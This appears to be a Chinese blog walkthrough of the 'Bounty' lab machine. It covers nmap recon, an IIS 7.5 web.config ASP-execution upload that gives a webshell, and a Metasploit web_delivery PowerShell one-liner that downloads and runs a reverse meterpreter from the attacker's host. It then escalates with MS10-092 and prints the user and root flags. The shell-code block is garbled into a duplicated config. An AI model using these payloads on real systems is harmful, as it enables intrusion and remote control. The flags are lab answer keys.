Please enable Javascript to view the contents

Bounty 练习记录

 ·  ☕ 3 分钟  ·  ✍️ IceKam · 👀... 阅读

环境介绍:

名称:Bounty

系统:Windows

信息搜集

获取目标

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
$ nmap -A 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST
Nmap scan report for 10.10.10.93
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
  • 系统为Windows 7``IIS/7.5

Bounty IIS

shell获取

系统漏枚举

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
 ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
  • 搜了下IIS/7.5具有web.config可执行ASP漏洞,以上为poc。

Web目录枚举

Bounty

  • 只有一个80端口,打开后没有什么,只有扫扫目录。

Bounty dir

Bounty dir

  • 找到一个远程执行的transfer.aspx 文件及UploadedFiles目录。

shell生成

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
  • 推荐一个asp的小马,然后保存为web.config

获得 webshell

Bounty upload

Bounty shell

  • 上传web.config后可执行shell,但是发现这个目录的文件会定时删除。

提权

反弹shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set SRVHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > set SRVPORT 80
msf5 exploit(multi/script/web_delivery) > set LHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.16:4444 
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://10.10.14.16:80/yXwrLG55ZN
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring('http://10.10.14.16/yXwrLG55ZN');
[*] 10.10.10.93      web_delivery - Delivering Payload (2125) bytes
[*] Sending stage (206403 bytes) to 10.10.10.93


msf5 exploit(multi/script/web_delivery) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > shell
Microsoft Windows [Version 6.1.7600]
  • 使用MSFweb_delivery模块生成powershell反弹链接,然后反弹。

本地漏洞枚举

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
C:\windows\system32\inetsrv>exit
exit
meterpreter > background 

msf5 exploit(multi/script/web_delivery) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1 
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
  • 获得以上漏洞。

搜索漏洞

1
2
3
4
5
6
7
8
msf5 post(multi/recon/local_exploit_suggester) > search ms10_092

Matching Modules
================

   ##  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/local/ms10_092_schelevator  2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege Escalation

利用

1
2
3
4
5
6
7
8
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator

msf5 exploit(windows/local/ms10_092_schelevator) > set session 1 
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.16

msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/local/ms10_092_schelevator) > run
  • 提权成功

flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter > cd c:/
meterpreter > cd Users
meterpreter > cd merlin
meterpreter > cd Desktop
meterpreter > dir
Listing: c:\Users\merlin\Desktop
================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2018-05-30 05:22:39 +0800  desktop.ini
100666/rw-rw-rw-  32    fil   2018-05-31 04:32:40 +0800  user.txt
meterpreter > cat user.txt
e29ad89891462e0b09741e3082f44a2fmeterpreter > 

meterpreter > cd ../
meterpreter > cd ../
meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > dir
Listing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2018-05-31 05:18:12 +0800  desktop.ini
100666/rw-rw-rw-  32    fil   2018-05-31 05:18:22 +0800  root.txt

meterpreter > cat root.txt
c837f7b699feef5475a0c079f9d4f5ea

心得

还可以,基础型,web系统提权都有。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
从来如此,便对么?